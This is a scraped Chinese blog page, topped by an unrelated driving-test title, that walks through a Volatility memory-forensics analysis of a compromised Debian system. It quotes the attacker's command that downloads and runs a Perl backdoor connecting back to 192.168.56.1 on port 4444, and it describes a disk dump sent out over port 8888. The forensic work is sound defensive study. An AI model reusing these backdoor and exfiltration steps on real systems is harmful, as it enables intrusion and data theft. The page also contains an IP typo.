b2科目四模拟试题多少题驾考考爆了怎么补救
b2科目四模拟试题多少题 驾考考爆了怎么补救

linux网络命令 【Volatility】取证实战(2)

电脑杂谈  发布时间:2018-02-14 06:55:38  来源:网络整理

第二,我们可以利用搜索引擎或者已公开的profile,例如,我们就可以看到一些已经公布的profile。

我这里使用的是第二种方法,在公开的项目中找到了Debian5.0的profile

紧接着,我们需要将profile放入对应的位置

即放入目录volatility/plugins/overlays/linux中。

然后,我们可以通过pythonvol.py--info来查看是否真的加载profile了。linux网络命令

我们可以看到profiles中已经能看到LinuxDebian5010x86了,这是我们压缩包的名字。

第三步开始分析文件

pythonvol.py-f./victoria-v8.memdump.img--profile=LinuxDebian5010x86-h

可以看到针对linux镜像的命令,以及相应功能介绍。

通过

linux网络命令_linux网络命令 本机ip_linux网络连接命令

pythonvol.py-f./victoria-v8.memdump.img--profile=LinuxDebian5010x86linux_psaux

我们可以查看进程。

我们可以发现一个可疑的nc连接。连接到192.168.56.1端口是8888

pythonvol.py-f./victoria-v8.memdump.img--profile=LinuxDebian5010x86linux_netstat

我们可以查看各种网络相关信息,如网络连接,路由表,接口状态等。

我们可以看到与292.168.56.1相关的网络连接情况,一个是4444端口,一个是8888端口,

pythonvol.py-f./victoria-v8.memdump.img--profile=LinuxDebian5010x86linux_bash

我们可以查看bash的历史记录

我们看到,通过scp命令复制了exim4目录下的所有文件,另外,我们在/mnt/var/log/exim4目录下的Eximrejectlog中看到,

两条命令,似乎从192.168.56.1下载了东西。

攻击者已经下载了两个文件c.pl和rk.tar,都在/tmp中。

c.pl的简单分析表明,它是一个perl脚本,用于创建一个c程序,该程序编译给支持SUID的可执行文件

打开一个后门并向攻击者发送信息。

c.pl被下载,并且编译的SUID在端口4444中打开了一个到192.168.56.1的连接,如下所示:

wget;perl/tmp/c.pl192.168.56.14444

以及,在pythonvol.py-f./victoria-v8.memdump.img--profile=LinuxDebian5010x86linux_bash,我们还看到了攻击者一个奇怪的操作。

攻击者将/dev/sda1整个dump下来,并通过8888端口发送了出去。

Eximreject日志显示IP192.168.56.101作为要发送邮件的主机:

abcde.com,owned.org和h0n3yn3t-pr0j3ct.com

攻击者可能只是一个脚本小子,利用已有的cve 公布了的exp 进入到了系统并没有成功登录账户其次通过分析,我们可以知道攻击的发起以及结束并且我们了解到攻击者简单尝试了登录账户32次后就放弃了。返回搜狐,查看更多


本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/jisuanjixue/article-76938-2.html

相关阅读
    发表评论  请自觉遵守互联网相关的政策法规,严禁发布、暴力、反动的言论

    • 栗刘芳
      栗刘芳

      还是三千亿

    • 孙肖尧
      孙肖尧

      是不是山寨出来的

    • 洛克恩斯托拉托斯
      洛克恩斯托拉托斯

      咱们啥时候也能这么霸气一回

    热点图片
    拼命载入中...